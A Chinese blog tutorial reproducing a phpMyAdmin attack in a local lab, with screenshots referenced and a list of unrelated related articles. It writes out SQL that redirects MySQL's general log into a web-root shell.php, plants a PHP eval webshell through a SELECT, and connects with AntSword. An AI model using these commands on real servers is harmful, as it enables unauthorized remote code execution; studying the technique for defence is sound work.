当前位置: 首页 > article >正文

PhPMyadmin-漏洞复现

前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!

首先搭建环境,登录后台
 

ScreenClip_20241128094616A422.png


点击》》SQL
 

ScreenClip_20241128094719A423.png


查看当前的日志状态

  SHOW VARIABLES LIKE 'general%';

image_20241128095055A424.png


因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用
set global general_log = “ON”;打开日志
然后后面打开genera_log_file 写到网站目录下

  set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下

image_20241128185248A440.png


查看日志,​​看更改日志文件路径是否成功
 

image_20241128185415A441.png


日志文件里写入一句话木马

  select '<?php @eval($_POST[cmd]);?>';

image_20241128185638A442.png


访问一下shell.php

  http://pikachu-master/shell.php

能够成功访问
 

image_20241128185917A443.png


然后适用蚁剑连接
 

image_20241128190126A444.png


成功连接


http://www.kler.cn/a/420755.html

相关文章:

  • Leetcode62. 不同路径(HOT100)
  • Vue根据Div内容的高度给其Div设置style height
  • 分布式集群下如何做到唯一序列号
  • 打造双层环形图:基础与高级渐变效果的应用
  • PostgreSQL17.x创建数据库及数据库信息查看命令
  • ChatGPT科研应用、论文写作、课题申报、数据分析与AI绘图
  • 工业公辅车间数智化节能头部企业,蘑菇物联选择 TDengine 升级 AI 云智控
  • [在线实验]-RabbitMQ镜像的下载与部署
  • android 阻止返回退出
  • 【笔记总结】华为云:应用上云后的安全规划及设计
  • form表单阻止默认事件及获取值
  • PH热榜 | 2024-12-02
  • Milvus Cloud 2.5:向量数据库的新里程碑与全文检索的革新
  • 大数据治理:解锁数据价值,引领未来创新
  • windows C#-测试引用相等性
  • 人机交互中的状态交互、趋势交互
  • vue 3中使用复制功能
  • C++【PCL】利用矩阵对点云进行刚体变换
  • golang的wails框架在macos下的问题
  • 基于STM32的电能监控系统设计:ModBus协议、RS-485存储和分析电能数据(代码示例)
  • 使用kaggle提供的免费gpu来实现语音克隆
  • Proxy与CGLib代理:深入解析与应用
  • 5.vue3+openlayers加载ArcGIS地图示例
  • Kafka 图形化工具 Eagle安装
  • ios上滚动条不能滑动 滚动卡住的问题
  • HTTP协议详解:从HTTP/1.0到HTTP/3的演变与优化